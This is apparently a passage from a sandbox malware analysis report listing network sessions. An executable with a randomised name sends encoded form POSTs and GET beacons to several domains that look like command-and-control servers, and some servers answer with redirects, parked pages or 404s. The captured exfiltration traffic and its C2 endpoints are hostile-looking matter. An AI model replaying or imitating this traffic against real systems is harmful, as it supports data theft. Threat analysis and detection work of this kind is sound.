                                                                                  Referer: http://www.whats-in-the-box.org/bqye/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:59:10.665601015 CEST | 6714 | OUT


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  70 | 192.168.11.20 | 49826 | 3.33.130.190 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:59:13.302844048 CEST | 554 | OUT | GET /bqye/?O4bP=9dRH6ZfHbJX&Xb3xI=orBWFM4TMH6bEQWb0mufnyz8+/9zteVW//lS5P1UVpZ6i4UA1urKkBRolapSd+D0qVvV/pdb4OKcqrb8qmiU7f8Sw/VtSC1B9WeqmjWWYlIhrofH/7u6E+o= HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.whats-in-the-box.org
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:59:13.409317017 CEST | 398 | IN | HTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Wed, 25 Sep 2024 07:59:13 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 258
                                                                                  Connection: close
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?O4bP=9dRH6ZfHbJX&Xb3xI=orBWFM4TMH6bEQWb0mufnyz8+/9zteVW//lS5P1UVpZ6i4UA1urKkBRolapSd+D0qVvV/pdb4OKcqrb8qmiU7f8Sw/VtSC1B9WeqmjWWYlIhrofH/7u6E+o="}</script></head></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  71 | 192.168.11.20 | 49827 | 3.33.130.190 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:59:18.538786888 CEST | 816 | OUT | POST /was5/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.linkwave.cloud
                                                                                  Origin: http://www.linkwave.cloud
                                                                                  Referer: http://www.linkwave.cloud/was5/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=/+kHACa6XDHale6Bry12IIzvxbTmkm0+IT0B0godfNrLS1dEwHCt200AWhEvUvDgIVHffEkz4Jds049zEqT3RQSfmx+OIUnvjoatMRb8bA3mYOl3EkQonEQgc7R2Fx+o8CShClkVc/0WaX1knzs09cUljrlNx9XR/SobVE8nDv6sA33P0hIadCiNWSByq8RCUg==


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  72 | 192.168.11.20 | 49828 | 3.33.130.190 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:59:21.178606033 CEST | 836 | OUT | POST /was5/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.linkwave.cloud
                                                                                  Origin: http://www.linkwave.cloud
                                                                                  Referer: http://www.linkwave.cloud/was5/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=/+kHACa6XDHak/KBkxt2fYzwobTmuG0iIT4B0hc3f+PLSXFExC2tx00AZBEuL/D3IVCifF0z4N1s05NzHZr0QASBqR+IVEnvjoatMRPGbEbmY9t3EG0nkEQvf7R2Sh+s8CTECgAvc98WaVtkmis7oMUj87kl4Mio1Rcya0MCBc+rBhmVpT8+eR+/Si4ao+QZJg/O39jrgaOB6uHPVD+fF6k=


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  73 | 192.168.11.20 | 49829 | 3.33.130.190 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:59:23.818974018 CEST | 1289 | OUT | POST /was5/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.linkwave.cloud
                                                                                  Origin: http://www.linkwave.cloud
                                                                                  Referer: http://www.linkwave.cloud/was5/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:59:23.819021940 CEST | 2578 | OUT
                                                                                  Sep 25, 2024 09:59:23.819073915 CEST | 4118 | OUT


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  74 | 192.168.11.20 | 49830 | 3.33.130.190 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:59:26.456190109 CEST | 548 | OUT | GET /was5/?Xb3xI=y8MnD3CAUjfvlbCaxAVac63GvK68hywkVQck0F03MMraCQdP6i6ahgEcKS99S8jCMAfRd1EgvYBIkI1gFr2JNRymkxf7KUrPibiqIzK4PCKgQN9qHiwVnD0=&O4bP=9dRH6ZfHbJX HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.linkwave.cloud
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:59:29.490098953 CEST | 398 | IN | HTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Wed, 25 Sep 2024 07:59:29 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 258
                                                                                  Connection: close
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Xb3xI=y8MnD3CAUjfvlbCaxAVac63GvK68hywkVQck0F03MMraCQdP6i6ahgEcKS99S8jCMAfRd1EgvYBIkI1gFr2JNRymkxf7KUrPibiqIzK4PCKgQN9qHiwVnD0=&O4bP=9dRH6ZfHbJX"}</script></head></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  75 | 192.168.11.20 | 49831 | 84.32.84.32 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:59:34.738835096 CEST | 819 | OUT | POST /7k8f/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dfmagazine.shop
                                                                                  Origin: http://www.dfmagazine.shop
                                                                                  Referer: http://www.dfmagazine.shop/7k8f/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=4z1WU9RqYjadMpuPDBvNvyXl0j97Tu3uZMyE5u6eArwA3Iz/dgm5xv99OYzuFpGw+walanqJAid/pmDC4y4rHCDiAVA2mPsi6XotBm5ce4D1rjs18BpIanJUGpwyUEKvD3FiptJBbqkVyW4K4JbNChVwO6UuUxr694T5l8TR2A2Rpw0Vdo48MBDEf8R5PIeJRw==


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                  76 | 192.168.11.20 | 49832 | 84.32.84.32 | 80
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:59:37.499583960 CEST | 839 | OUT | POST /7k8f/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dfmagazine.shop
                                                                                  Origin: http://www.dfmagazine.shop
                                                                                  Referer: http://www.dfmagazine.shop/7k8f/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=4z1WU9RqYjadNJ+PPCHNqSXmpT97K+3qZM+E5uTDAdIAwoD/chm50v99JozvBpG/+wetamWJAiJ/pmTC5D4oBSDgP1A0pvsi6XotBnd2e4L1oTc1uwpHZnJbMJwyD0KrD3ENpsUkbv4VyXIK5bzOIhV6EaV5TQyK4M2Mk9KD/lKMsmlPAaMYPSf2bMoRNKfSM6Xv3zTP6LXywSgat2MT7pg=


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                  77 | 192.168.11.20 | 49833 | 84.32.84.32 | 80
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:59:40.263812065 CEST | 1289 | OUT | POST /7k8f/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dfmagazine.shop
                                                                                  Origin: http://www.dfmagazine.shop
                                                                                  Referer: http://www.dfmagazine.shop/7k8f/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=[TRUNCATED]


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                  78 | 192.168.11.20 | 49834 | 84.32.84.32 | 80
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:59:43.014811039 CEST | 549 | OUT | GET /7k8f/?O4bP=9dRH6ZfHbJX&Xb3xI=1xd2XIdTc2qaFZ+FWSTYli7OxzQOBufybu6t7KDIboRfwcHmUmPthK5WfpWTXJmR/FSLDU2eJw9bxVvh/BR2RAGhDgY7k/sU7CIWPHYqUL7qqxcngXtaZyk= HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dfmagazine.shop
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:59:43.241939068 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                  Server: hcdn
                                                                                  Date: Wed, 25 Sep 2024 07:59:43 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 10072
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  x-hcdn-request-id: 61e488ed2177afaa34558a25d80ad808-asc-edge4
                                                                                  Expires: Wed, 25 Sep 2024 07:59:42 GMT
                                                                                  Cache-Control: no-cache
                                                                                  Accept-Ranges: bytes
                                                                                  Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                  79 | 192.168.11.20 | 49835 | 54.67.87.110 | 80
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:59:53.443715096 CEST | 798 | OUT | POST /txr6/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.ngmr.xyz
                                                                                  Origin: http://www.ngmr.xyz
                                                                                  Referer: http://www.ngmr.xyz/txr6/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=qRo7UWlGE2pUjX1GvRfcsDJjcuyOmHkIDr9TBB+ETZ0+INBdx/5maRbfm/TtzrI9Ie/VLkBRAXnQ5DxKjBnB2Tg+qWc24zm8iKBqUXZzBQMBtbZ6fV8c24uQ0n3zfauNJhp9z/Em4Wmw7owstNwyQxtEL9Pq2xz5Vs4+IU1nq4H44++y/Xp9dq16KZUivNrUpQ==
                                                                                  Sep 25, 2024 09:59:53.614177942 CEST | 550 | IN | HTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Content-Length: 282
                                                                                  Accept-Ranges: bytes
                                                                                  Date: Wed, 25 Sep 2024 08:22:19 GMT
                                                                                  X-Varnish: 1105031287
                                                                                  Age: 0
                                                                                  Via: 1.1 varnish
                                                                                  Connection: close
                                                                                  X-Varnish-Cache: MISS
                                                                                  Server: C2M Server v1.02
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                  80 | 192.168.11.20 | 49836 | 54.67.87.110 | 80
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:59:56.145169973 CEST | 818 | OUT | POST /txr6/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.ngmr.xyz
                                                                                  Origin: http://www.ngmr.xyz
                                                                                  Referer: http://www.ngmr.xyz/txr6/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=qRo7UWlGE2pUj3lGsy3ckDJgA+yOsnkMDrhTBA7DTrQ+Itxdw6ZmZRbf0fTo3rI6IezrLhhRAUbQ5BpKjWzOnTg4zmc48zm8iKBqUX9ZBUgBsqJ6OE8boouf3n3zbauzJhoez6gc4Uuw7ogstcwxaxtCP9OGxhmuNu4jYnJ3tr/z0IvoildZe5pIOptKtPqP0ePRQOUI4WwFoMCu5GTxOaM=
                                                                                  Sep 25, 2024 09:59:56.315361977 CEST | 550 | IN | HTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Content-Length: 282
                                                                                  Accept-Ranges: bytes
                                                                                  Date: Wed, 25 Sep 2024 08:22:21 GMT
                                                                                  X-Varnish: 1105031295
                                                                                  Age: 0
                                                                                  Via: 1.1 varnish
                                                                                  Connection: close
                                                                                  X-Varnish-Cache: MISS
                                                                                  Server: C2M Server v1.02
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                  81 | 192.168.11.20 | 49837 | 54.67.87.110 | 80
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:59:58.847220898 CEST | 2578 | OUT | POST /txr6/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.ngmr.xyz
                                                                                  Origin: http://www.ngmr.xyz
                                                                                  Referer: http://www.ngmr.xyz/txr6/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data: Xb3xI=[encoded POST body omitted]
                                                                                  Sep 25, 2024 09:59:58.847239017 CEST | 5156 | OUT | Data: [encoded POST body continuation omitted]
                                                                                  Sep 25, 2024 09:59:58.847286940 CEST | 233 | OUT | Data: [encoded POST body continuation omitted]
                                                                                  Sep 25, 2024 09:59:59.018204927 CEST | 550 | IN | HTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Content-Length: 282
                                                                                  Accept-Ranges: bytes
                                                                                  Date: Wed, 25 Sep 2024 08:22:24 GMT
                                                                                  X-Varnish: 1105031299
                                                                                  Age: 0
                                                                                  Via: 1.1 varnish
                                                                                  Connection: close
                                                                                  X-Varnish-Cache: MISS
                                                                                  Server: C2M Server v1.02
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                  82 | 192.168.11.20 | 49838 | 54.67.87.110 | 80
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 10:00:01.547859907 CEST | 542 | OUT | GET /txr6/?Xb3xI=nTAbXiRbAR9Tmn1EygfckhJ8auTVp3cQBZgFAHmQGrw0Kpxo+btzHXTBwKiLhdY3AsfxfRA0GE/MmBFG+RiimQs6glJH3Tq6ibBpV287KGVZpLZHDS41jcE=&O4bP=9dRH6ZfHbJX HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.ngmr.xyz
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 10:00:01.718249083 CEST | 550 | IN | HTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Content-Length: 282
                                                                                  Accept-Ranges: bytes
                                                                                  Date: Wed, 25 Sep 2024 08:22:27 GMT
                                                                                  X-Varnish: 1105031301
                                                                                  Age: 0
                                                                                  Via: 1.1 varnish
                                                                                  Connection: close
                                                                                  X-Varnish-Cache: MISS
                                                                                  Server: C2M Server v1.02
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                  83 | 192.168.11.20 | 49839 | 194.58.112.174 | 80
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 10:00:06.968235970 CEST | 831 | OUT | POST /7cy1/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.albero-dveri.online
                                                                                  Origin: http://www.albero-dveri.online
                                                                                  Referer: http://www.albero-dveri.online/7cy1/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=AsGHKhpyYI3IW7wEhbPfjdX2HNEz12nn7LIbMZwB8oZPIcCSZntLxRUuEuzS2VruDxGlXeS28D+7BhrBQO/evvzeZx0MK5/czCQatURK/PKU+OelmKbXaPTmBF6J9nc53R1ksDII8+pQutz2hpiv1GOFX4YHvJ7IOZff8mdBMF6TdyqGKHstgoTLT24fPCynjw==
                                                                                  Sep 25, 2024 10:00:07.199125051 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 08:00:07 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip
                                                                                  Data: [gzip-compressed body omitted]
                                                                                  Sep 25, 2024 10:00:07.199225903 CEST | 1246 | IN | Data: [gzip-compressed body continuation omitted]
                                                                                  Sep 25, 2024 10:00:07.199287891 CEST | 1289 | IN | Data: [gzip-compressed body continuation omitted]


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                  84 | 192.168.11.20 | 49840 | 194.58.112.174 | 80
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 10:00:09.733139992 CEST | 851 | OUT | POST /7cy1/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.albero-dveri.online
                                                                                  Origin: http://www.albero-dveri.online
                                                                                  Referer: http://www.albero-dveri.online/7cy1/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=AsGHKhpyYI3IEKAEi8jf2NX1MtEz8Wnd7LEbMY0R8a9PI9ySeVFLyRUuPOyayVrhDxLGXfu28Dq7BgbBT9nfu/zcRR0OUJ/czCQatUEt/JiU+/ulpOPUEfThCF6JqXc93R18sD4m88BQusD2h9OsvWOfYYZNh6SvJoz31kpqNlCmck7cX1YJj7P5XGB3NAz8+wfN2Gzi9yIwiWb0qW1WAbI=
                                                                                  Sep 25, 2024 10:00:09.962564945 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 08:00:09 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip
                                                                                  Data: [gzip-compressed body omitted]
                                                                                  Sep 25, 2024 10:00:09.962594032 CEST | 1289 | IN | Data: [gzip-compressed body continuation omitted]
                                                                                  Sep 25, 2024 10:00:09.962846994 CEST | 1246 | IN | Data: [gzip-compressed body continuation omitted]


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                  85 | 192.168.11.20 | 49841 | 194.58.112.174 | 80
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 10:00:12.500293970 CEST | 2578 | OUT | POST /7cy1/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.albero-dveri.online
                                                                                  Origin: http://www.albero-dveri.online
                                                                                  Referer: http://www.albero-dveri.online/7cy1/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
